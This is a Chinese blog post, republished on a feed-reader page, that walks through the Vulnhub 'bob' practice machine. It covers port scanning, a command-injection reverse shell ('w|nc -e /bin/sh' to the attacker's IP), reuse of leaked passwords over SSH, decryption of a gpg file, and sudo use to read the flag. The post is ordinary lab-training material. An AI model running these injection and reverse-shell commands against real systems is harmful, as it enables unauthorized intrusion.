惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
A
About on SuperTechFans
IT之家
IT之家
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Blog — PlanetScale
Blog — PlanetScale
aimingoo的专栏
aimingoo的专栏
云风的 BLOG
云风的 BLOG
The GitHub Blog
The GitHub Blog
Vercel News
Vercel News
G
Google Developers Blog
J
Java Code Geeks
宝玉的分享
宝玉的分享
T
Tailwind CSS Blog
Cloudbric
Cloudbric
L
LINUX DO - 最新话题
MyScale Blog
MyScale Blog
H
Heimdal Security Blog
PCI Perspectives
PCI Perspectives
Attack and Defense Labs
Attack and Defense Labs
S
Security @ Cisco Blogs
Latest news
Latest news
I
Intezer
L
Lohrmann on Cybersecurity
C
CXSECURITY Database RSS Feed - CXSecurity.com
月光博客
月光博客
T
Threatpost
博客园 - 【当耐特】
S
Schneier on Security
P
Privacy International News Feed
G
GRAHAM CLULEY
T
Tenable Blog
AWS News Blog
AWS News Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
雷峰网
雷峰网
博客园 - Franky
Engineering at Meta
Engineering at Meta
美团技术团队
S
Secure Thoughts
T
Troy Hunt's Blog
Microsoft Security Blog
Microsoft Security Blog
SecWiki News
SecWiki News
V
Visual Studio Blog
人人都是产品经理
人人都是产品经理
Application and Cybersecurity Blog
Application and Cybersecurity Blog
Cisco Talos Blog
Cisco Talos Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Martin Fowler
Martin Fowler
Webroot Blog
Webroot Blog
Google DeepMind News
Google DeepMind News
H
Hackread – Cybersecurity News, Data Breaches, AI and More

猫涅的秘密结社

hackthissite-org 数据库原理相关 关于在与我互动前你可能需要了解的事 信安roadmap 个人主页开发汇报 六级生词速记本——附考后感想 数据结构C++自学相关 NewStarCTF-2025 三款steam付费番茄钟软件测评 夏令营-ai hello-world qt环境下的c++程序编写 新新的年 qq机器人配置二三事 搞点java 读书笔记-当下的力量 网页小修时间 glibc更新记录 Vulhub在线靶场记录 Vulhub记录(旧的) 神奇脚本在哪里-CTF之Pwn BaseCTF高校联合新生赛2024 逆逆逆逆逆向-CTF之reverse 求解 夺旗时间 学学学 渗透测试相关 协议/漏洞/网络 最新的知识点 数据分析相关 zico2解析 OverTheWire-bandit解析 CTF实战相关2 靶机解析-gigachad ctf实战相关1 复习time 开学季 维修时间 小小修整 学校实训-笔记 每周靶机之Beelzebub 读书笔记-如何阅读一本书 DC-4解析 DC-2解析 每周靶机之ted 靶机-DC-1 potato解析 xss跨站点脚本攻击 每周靶机之Tommyboy1dot0 owasp命令执行漏洞 owasp文件包含漏洞 每周靶机之WALLABY'S-NIGHTMARE owasp上传漏洞 Hackademic.RTB1 owasp与sql注入与sqlmap liunx中sudo服务相关知识 liunx中ssh服务相关知识 moneybox解析 C语言相关1 关于加入aplayer的方式 再来一次 关于在next7.8.0中建设评论功能这件事 目前的进展 编辑小提示
每周靶机之bob
nirvana_felis · 2023-12-10 · via 猫涅的秘密结社

总之这是这周的靶机

环境设置

攻击机:kali(192.168.246.128)
靶机:bob (192.168.246.138)

使用工具&指令&知识

nc(瑞士军刀)
nmap (端口扫描)
gpg加密
命令执行漏洞

具体过程

首先国际惯例

1
2
arp-scan -l //发现同网段设备
nmap -A -p- [ip地址] //扫描该ip的端口并使用默认脚本

3
4
发现了该靶机开放了21端口(对应ftp服务) 80端口(对应http服务) 25468端口(对应ssh服务)
我们先从http服务开启 firefox访问
5
主页与超链接经检查 没有发现什么特别的东西
于是我们来看看nmap在/robots.txt下扫描出的四个目录

什么是robots.txt

robots.txt是网站管理者写给爬虫的一封信,里面描述了网站管理者不希望爬虫做的事,比如:

  • 不要访问某个文件、文件夹
  • 禁止某些爬虫的访问
  • 限制爬虫访问网站的频率

一个自觉且善意的爬虫,应该在抓取网页之前,先阅读robots.txt,了解并执行网站管理者制定的爬虫规则。

发现dev-shell目录中存在命令执行漏洞 既使用 管道符| 来执行nc相关命令
在kali上执行nc -lnvp 1234 //指定1234端口开始监听
7
运用命令行输入w|nc -e /bin/sh [kali的ip] [指定端口]

1
2

随后反弹shell成功
首先 反弹到的shell页面不是很易懂 我们可以使用python -c 'import pty; pty.spawn("/bin/bash")'来创建一个伪终端 方便后面的操作

8

根据该作者在vulnhub上的提示 flag文件位于**/目录
但权限不够 我们需要提权
先根据我们对该靶机的推测 在/home/bob中寻找线索
发现了一个
.old_passwordfile.html**
9
查看后是两对密码和账号
我们通过ssh链接来分别测试这些账号密码
10
很好 jc账号的密码正确 链接了靶机
11
再次在/home/bob下寻找线索 发现/Documents下有一个名为secret的文件夹和一个经过gpg加密的文件login.txt 需要密码
我们使用ls -alR // -R 递归显示所有子文件夹和其中的文件查看
13
有一个notes.sh文件 我们查看其中的内容
14
前言不搭后语的 但第一个字母都着重大写了 并且是一个单词 我们把它当作藏头诗理解 尝试解密先前的gpg文件
16
gpg --output [输出文件名] --decrypt [需要解密的文件名]
15
输入密码HARPOCRATES(你可别说这页面还挺炫)
16
解密出来又是一套账号密码
再次登录 发现这次的账号有sudo权限
那很方便了 利用sudo查看该flag文件
17
结束!

总结

较为简短的靶机 结合了gpg加密与命令执行漏洞的知识
学无止境 期待下次的靶机